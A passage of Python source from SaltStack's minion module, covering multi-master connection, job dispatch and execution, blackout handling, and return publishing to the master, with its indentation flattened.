self.io_loop = ZMQDefaultLoop.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True}) # Tornado backward compat
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _check_minions(self):
'''
Check the size of self.minions and raise an error if it's empty
'''
if not self.minions:
err = ('Minion unable to successfully connect to '
'a Salt Master. Exiting.')
log.error(err)
raise SaltSystemExit(code=42, msg=err)
def _spawn_minions(self, timeout=60):
'''
Spawn all the coroutines which will sign in to masters
'''
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending on the networking and sets of masters. If match is 'any' we let
# eval_master handle the discovery instead so disconnections can also handle
# discovery
if isinstance(self.opts['discovery'], dict) and self.opts['discovery'].get('multimaster'):
self._discover_masters()
masters = self.opts['master']
if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self._connect_minion(minion)
self.io_loop.call_later(timeout, self._check_minions)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
auth_wait = minion.opts['acceptance_wait_time']
failed = False
while True:
if failed:
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
log.debug(
"sleeping before reconnect attempt to %s [%d/%d]",
minion.opts['master'],
auth_wait,
self.max_auth_wait,
)
yield tornado.gen.sleep(auth_wait) # TODO: log?
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons(before_connect=True)
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler(before_connect=True)
yield minion.connect_master(failed=failed)
minion.tune_in(start=False)
self.minions.append(minion)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up minion for multi-master. Is '
'master at %s responding?', minion.opts['master']
)
except SaltMasterUnresolvableError:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. ' \
'Set \'master\' value in minion config.'.format(minion.opts['master'])
log.error(err)
break
except Exception as e:
failed = True
log.critical(
'Unexpected error while connecting to %s',
minion.opts['master'], exc_info=True
)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
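
Usage example (a minimal sketch, assuming a readable minion
configuration; in practice this object is normally created by the
salt-minion daemon or by MinionManager rather than directly):

.. code-block:: python

    import salt.config
    import salt.minion

    opts = salt.config.minion_config('/etc/salt/minion')
    minion = salt.minion.Minion(opts)
    minion.tune_in()  # connects to the master and blocks, serving jobs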
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = [] if jid_queue is None else jid_queue
self.periodic_callbacks = {}
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if zmq:
if ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.platform.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
log.info('Creating minion process manager')
if self.opts['random_startup_delay']:
sleep_time = random.randint(0, self.opts['random_startup_delay'])
log.info(
'Minion sleeping for %s seconds due to configured '
'startup_delay between 0 and %s seconds',
sleep_time, self.opts['random_startup_delay']
)
time.sleep(sleep_time)
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True})
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.platform.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None, failed=False):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master(failed=failed)
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
if self._connect_master_future.done():
future_exception = self._connect_master_future.exception()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self, failed=False):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None, opts=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
opt_in = True
if not opts:
opts = self.opts
opt_in = False
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug(
'modules_max_memory set, enforcing a maximum of %s',
opts['modules_max_memory']
)
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
mem_limit = rss + vms + opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
opts['grains'] = salt.loader.grains(opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(opts, proxy=proxy)
if opts.get('multimaster', False):
s_opts = copy.deepcopy(opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(opts, functions, proxy=proxy)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(opts, functions, proxy=proxy)
if opt_in:
self.opts = opts
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
'''
Fire an event on the master, or drop message if unable to send.
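
Example of an internal call (a sketch; the tag and data are
illustrative):

.. code-block:: python

    self._fire_master(data={'status': 'ready'}, tag='minion/custom/tag')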
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return False
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
return False
else:
if timeout_handler is None:
def handle_timeout(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return True
timeout_handler = handle_timeout
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
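
Example of the decoded ``data`` this method receives (a sketch; the
values are illustrative):

.. code-block:: python

    {'jid': '20190101120000000000',
     'fun': 'test.ping',
     'arg': [],
     'tgt': '*',
     'tgt_type': 'glob',
     'user': 'root',
     'ret': ''}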
'''
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warning("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid']))
yield tornado.gen.sleep(10)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance reference to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.platform.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''
Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
def run_func(minion_instance, opts, data):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
return Minion._thread_multi_return(minion_instance, opts, data)
else:
return Minion._thread_return(minion_instance, opts, data)
with tornado.stack_context.StackContext(functools.partial(RequestContext,
{'data': data, 'opts': opts})):
with tornado.stack_context.StackContext(minion_instance.ctx):
run_func(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target; it starts the actual
minion-side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job %s with PID %s', data['jid'], sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
executors = data.get('module_executors') or \
getattr(minion_instance, 'module_executors', []) or \
opts.get('module_executors', ['direct_call'])
allow_missing_funcs = any([
minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
for executor in executors
if '{0}.allow_missing_func'.format(executor) in minion_instance.executors
])
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data['arg'], data
minion_instance.functions.pack['__context__']['retcode'] = 0
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(return_data.get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'] = retcode
ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
function_name, exc, func.__doc__ or ''
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been converted to a comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target; it starts the actual
minion-side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job %s with PID %s', data['jid'], sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
key = ind if multifunc_ordered else data['fun'][ind]
ret['return'][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(ret['return'][key].get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret['retcode'][key] = retcode
ret['success'][key] = retcode == 0
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
log.trace('Return data: %s', ret)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['uid'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
if ret['jid'] == 'req':
ret['jid'] = salt.utils.jid.gen_jid(self.opts)
salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
